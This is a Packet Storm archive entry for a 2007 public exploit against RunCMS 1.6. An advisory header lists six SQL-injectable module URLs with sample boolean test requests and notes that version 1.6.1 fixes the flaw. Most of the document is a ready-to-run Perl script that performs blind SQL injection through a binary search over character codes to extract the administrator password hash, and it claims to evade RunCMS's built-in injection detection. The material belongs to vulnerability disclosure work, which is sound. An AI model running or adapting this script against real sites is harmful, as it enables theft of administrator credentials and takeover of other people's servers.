runcms-sqlids.txt

2007-12-28T00:00:00
ID PACKETSTORM:62122
Type packetstorm
Reporter Sh2kerr
Modified 2007-12-28T00:00:00

Description

                                        
                                            `#/******************************************************************/  
#/****** RUNCMS 1.6 BLIND SQL Injection Exploit + IDS evasion *****/  
#/******************************************************************/  
#/*********** exploit get hash of admin password *************/  
#/*********** **************/  
#/*********** Exploit is invisible for **************/  
#/*********** RUNCMS sql injection detecting mechanism *************/  
#/******************************************************************/  
#/******************************************************************/  
#/*********** tested on RUNCMS english version 1.6 *********/  
#/******************************************************************/  
#/******************************************************************/  
#/* Date of Public EXPLOIT: December 25, 2007 */  
#/* Written by: Alexandr "Sh2kerr" Polyakov */  
#/* from [Digital Security Research Group] */  
#/* research [at] dsec [dot] ru */  
#/* */  
#/*Original Advisory: http://www.securityfocus.com/archive/1/485512*/ */  
#/******************************************************************/  
#  
#  
#  
#  
# Details  
#************************************************************************************  
#  
#  
# Multiple Blind SQL Injection  
#  
# Attacker can inject SQL code in modules:  
#  
# http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid+DSecRG_INJECTION  
# http://[server]/[installdir]/modules/mydownloads/visit.php?lid=2+DSecRG_INJECTION  
# http://[server]/[installdir]/modules/mydownloads/ratefile.php?lid=2+DSecRG_INJECTION  
# http://[server]/[installdir]/modules/mylinks/ratelink.php?lid=2+DSecRG_INJECTION  
# http://[server]/[installdir]/modules/mylinks/modlink.php?lid=2+DSecRG_INJECTION  
# http://[server]/[installdir]/modules/mylinks/brokenlink.php?lid=2+DSecRG_INJECTION  
#  
# Example:  
#  
# This query will return link to download file:  
# GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=1 HTTP/1.0  
#  
#  
# This query will return error:  
# GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=0 HTTP/1.0  
#  
#  
#  
# Fix Information  
#*************************************************************************************  
#  
#RunCMS was altered to fix this flaw on Dec 15, 2007. Updated version (1.6.1) can be downloaded here:  
# http://www.runcms.org/modules/mydownloads/visit.php?lid=131  
#  
#  
#  
# About  
#*************************************************************************************  
#  
# Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration  
# testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards.  
# Digital Security Research Group focuses on web application and database security problems with vulnerability reports,  
# advisories and whitepapers posted regularly on our website.  
#  
#  
# Contact: research [at] dsec [dot] ru  
# http://www.dsec.ru (in Russian)  
#  
#  
#  
#  
##############################################################################v  
  
  
  
  
  
  
  
#!/usr/bin/perl  
  
  
use LWP::UserAgent;  
  
$path = $ARGV[0];  
$string = "this file must"; # !!CHEAT!! this string must be changed ef Runsms language is not English  
$user_id = $ARGV[1];  
if (@ARGV < 2) { &usage; }  
  
  
$s_num =1;  
$n=0;  
$|++;  
print "\r\n\r\n";  
  
print "****** RunCMS 1.6 Blind SQLInjection + IDS Evasion by Sh2kerr (DSecRG) ******\r\n";  
print "*****************************************************************************\r\n";  
  
  
while(1)  
{  
&found(48,122);  
  
if ($char=="0")  
{  
  
  
print "\r\n\r\n";  
  
print "*****************************************************************************\r\n";  
print " Admin Password Hash: $allchar\r\n";  
print "*****************************************************************************\r\n";  
  
exit();  
}  
else  
{ print ":) "; $allchar .= chr($char);  
}  
  
$s_num++;  
}  
  
if ($char=="0")  
{}  
  
  
  
  
  
sub found($$)  
{  
my $fmin = $_[0];  
my $fmax = $_[1];  
  
  
if (($fmax-$fmin)<5) { $char=&crack($fmin,$fmax); return $char }  
  
$r = int($fmax - ($fmax-$fmin)/2);  
$check = ">$r";  
  
if ( &check($check) )  
{ &found($r,$fmax); }  
else { &found($fmin,$r+1); }  
}  
  
  
  
sub crack($$)  
{  
my $cmin = $_[0];  
my $cmax = $_[1];  
$i = $cmin;  
  
while ($i<$cmax)  
{  
$crcheck = "=$i";  
if ( &check($crcheck) ) { return $i;}  
$i++;  
}  
return;  
}  
  
  
  
sub check($)  
{  
  
$n++;  
$ccheck = $_[0];  
  
$http_query = $path." AND ascii(substring((SELECT(pass)FROM(runcms.runcms_users)WHERE uid=".$user_id."),".$s_num.",1))".$ccheck;  
  
  
$mcb_reguest = LWP::UserAgent->new() or die;  
$res = $mcb_reguest->post($http_query);  
  
@results = $res->content;  
foreach $result(@results)  
{  
if ($result =~ /$string/) { return 1; }  
}  
return 0;  
}  
  
sub usage  
{  
print "Usage: $0 [path_to_script?param] user_id \r\n";  
print "e.g. : $0 http://[site]/modules/mydownloads/visit.php?lid=3 1";  
exit();  
}  
  
  
`